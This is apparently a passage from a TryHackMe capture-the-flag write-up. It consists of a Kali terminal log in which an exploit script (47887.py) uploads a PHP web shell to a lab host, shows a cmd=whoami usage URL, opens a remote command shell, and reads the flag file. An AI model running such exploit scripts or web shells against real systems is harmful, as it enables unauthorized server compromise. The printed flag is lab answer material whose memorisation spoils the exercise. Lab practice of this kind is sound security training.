{17C2B446-773E-4BF6-BDBE-86BB9E3A4BE0}.png

{D8390FB2-C7B3-4ADC-B1B8-ACAD59719C16}.png

┌──(kali㉿kali)-[~/Downloads]
└─$ python3 47887.py <http://10.201.80.87> 
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to <http://10.201.80.87/bootstrap/img/sRXBAMtsJ5.php>
> Example command usage: <http://10.201.80.87/bootstrap/img/sRXBAMtsJ5.php?cmd=whoami>
> Do you wish to launch a shell here? (y/n): y
RCE $ ls
OyWjgNLIbq.php
android_studio.jpg
beauty_js.jpg
c_14_quick.jpg
c_sharp_6.jpg
doing_good.jpg
flag.txt
img1.jpg
img2.jpg
img3.jpg
kotlin_250x250.png
logic_program.jpg
mobile_app.jpg
pro_asp4.jpg
pro_js.jpg
sRXBAMtsJ5.php
unnamed.png
web_app_dev.jpg

RCE $ ls
OyWjgNLIbq.php
android_studio.jpg
beauty_js.jpg
c_14_quick.jpg
c_sharp_6.jpg
doing_good.jpg
flag.txt
img1.jpg
img2.jpg
img3.jpg
kotlin_250x250.png
logic_program.jpg
mobile_app.jpg
pro_asp4.jpg
pro_js.jpg
sRXBAMtsJ5.php
unnamed.png
web_app_dev.jpg

RCE $ cat flag.txt
THM{BOOK_KEEPING}

RCE $